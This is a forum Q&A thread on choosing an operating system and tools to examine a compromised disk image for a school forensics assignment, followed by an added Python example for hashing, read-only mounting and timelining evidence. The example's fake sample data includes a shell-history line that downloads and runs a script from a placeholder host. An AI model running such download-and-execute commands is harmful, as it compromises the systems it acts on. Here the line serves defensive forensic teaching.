I have been given an assignment from my school, in which I have been given a virtual image of a compromised system. The first thing I need to do is set up an environment to which we can mount the image. I need to choose an OS, and I was wondering: What should I choose, and why? If anyone could give me any pointers I should look out for, it would be much appreciated! Thanks

Use whatever operating system you feel comfortable with and has the ability to run the tools you need. An investigation into a compromised system can get very technical, and I have a feeling you might want to leverage tools available for Windows and *nix distros to investigate this. Your job is to know how to use these tools to discover data of relevance, then leverage similar tools to help validate your findings. Figure out what you want to look for, figure out what tools help find those artifacts, then choose the OS accordingly. You'll soon find there is no best OS for an examiner.
– 0xhughes Feb 10 '14 at 17:17

Beware with this. In a trial you will face questions like "So, these programs could be modified by anyone?" and "How can you be sure your system hasn't compromised the original image?". In a trial a lot of forensics experts will go to paid proprietary systems, since they are easier to comprehend for judges and lawyers.
– kiBytes Feb 10 '14 at 12:23

3

@kiBytes Good points, thanks. After the NSA scandal, though, similar questions could be asked about proprietary software. (Whether they will convince a judge or jury is another story!) Either way, the OP did well to perform analysis on copies of the image.
– S.L. Barth Feb 10 '14 at 12:28

2

In an academic environment I believe a distro like Kali is a perfect choice. In a trial there are some known brands most forensics experts choose to use (although they may use a Linux distro to help themselves).
– kiBytes Feb 10 '14 at 12:31

When I was at university I used BackTrack Linux a LOT. It has a lot of forensics (and live forensics) tools preinstalled and it is designed to be used for these purposes (although it is probably most famous for nefarious hacking and spying on suspected cow tippers etc.).

It depends on the tool you choose. Forensic tools like Autopsy can run on several different operating systems. They can parse the filesystem of the image you've been given, and show you the contents of the files. If such a tool is written in Java, you can run it on Windows, Mac, or Linux.

In forensic work, you are not necessarily trying to "run" the software from the image. You often are simply looking at the files you collect from the system, and piecing together what happened based on file contents, file system attributes such as last-accessed-time, creator ID, etc. If you were to mount the file system in the OS and run programs that accessed those files, your own investigative activity would likely hide the very clues you are seeking to uncover.

But sometimes you won't have much of a choice. If you discover a file named foo.docx, a simple text editor will show you very little, and you will likely need to use Word to view it. That creates another problem: what if the file you're trying to examine contains a virus? Opening it in Word on your computer could subject you to exactly the same problems as the victim computer image you're looking at. In that case, you need to learn to use a virtual machine as a sandbox.
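The workflow the answers and comments describe, as an added example that is not code from the original thread: hash the evidence copy before and after work (the "how can you be sure your system hasn't compromised the original image?" question from the comments), build a read-only loop-mount command that keeps anything on the image from executing or having its access times touched, and then pull a mactime-style timeline from file-system metadata with `lstat` only, without opening a single file. The image path, mount point, partition start sector and the sample tree are assumptions constructed for the demo.

```python
"""Added example, not from the original answers. Verify an evidence image's
hash before and after work, build a read-only loop-mount command, and produce
a mactime-style timeline from metadata without opening any file.
The paths, mount point and partition offset are assumed values."""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

SECTOR = 512  # logical sector size; check `fdisk -l image` on a real case


def sha256_file(path, chunk=1 << 20):
    """Stream the image through SHA-256 so multi-GB images need little RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def check_integrity(path, expected):
    """Compare against the hash recorded at acquisition. Run before mounting
    and again after unmounting to show the working copy was not altered."""
    actual = sha256_file(path)
    return actual == expected, actual


def mount_argv(image, mountpoint, start_sector=0, fstype=None):
    """argv for a read-only loop mount. ro blocks writes, noexec/nosuid/nodev
    stop anything on the image from executing, noatime avoids touching access
    times even if the examiner browses the tree. offset= selects a partition
    inside a whole-disk image (start sector is an assumed value here)."""
    opts = ["ro", "noexec", "nosuid", "nodev", "noatime", "loop"]
    if start_sector:
        opts.append(f"offset={start_sector * SECTOR}")
    argv = ["mount", "-o", ",".join(opts)]
    if fstype:
        argv += ["-t", fstype]
    return argv + [image, mountpoint]


def timeline(root):
    """Walk a mounted tree using lstat only (no open(), no symlink following)
    and return rows (utc_iso, flags, uid, relpath) sorted by time. flags is a
    subset of "mac": which of mtime/atime/ctime fell on that timestamp."""
    rows = []
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            by_ts = {}
            for flag, ts in (("m", st.st_mtime), ("a", st.st_atime), ("c", st.st_ctime)):
                by_ts.setdefault(int(ts), []).append(flag)
            for ts, flags in by_ts.items():
                iso = datetime.fromtimestamp(ts, timezone.utc).isoformat()
                rows.append((iso, "".join(flags), st.st_uid, os.path.relpath(p, root)))
    return sorted(rows)


def make_sample_tree():
    """Constructed sample evidence tree for a dry run (not real data).
    Returns (root, path_of_empty_stand_in_image)."""
    root = tempfile.mkdtemp(prefix="evidence_")
    home = os.path.join(root, "home", "alice")
    os.makedirs(home)
    hist = os.path.join(home, ".bash_history")
    with open(hist, "w") as f:
        f.write("wget http://example.invalid/x.sh\nchmod +x x.sh\n./x.sh\n")
    os.utime(hist, (1_392_000_000, 1_392_000_000))  # 2014-02-10T02:40:00Z
    image = os.path.join(root, "disk.dd")
    open(image, "wb").close()  # zero-byte stand-in for the real image
    return root, image


if __name__ == "__main__":
    root, image = make_sample_tree()
    ok, digest = check_integrity(image, sha256_file(image))
    print("integrity ok:", ok, digest)
    print(" ".join(mount_argv("/cases/1/disk.dd", "/mnt/evidence", start_sector=2048)))
    for row in timeline(root):
        print(*row)
```

On a real case the mount line is run as root after `fdisk -l` has given the partition's start sector; everything else runs unprivileged against the mount point. The `c` row for a file will always show the time the copy was written to your analysis disk, not the original ctime, which is one reason examiners prefer parsing the image with a tool like The Sleuth Kit over mounting it.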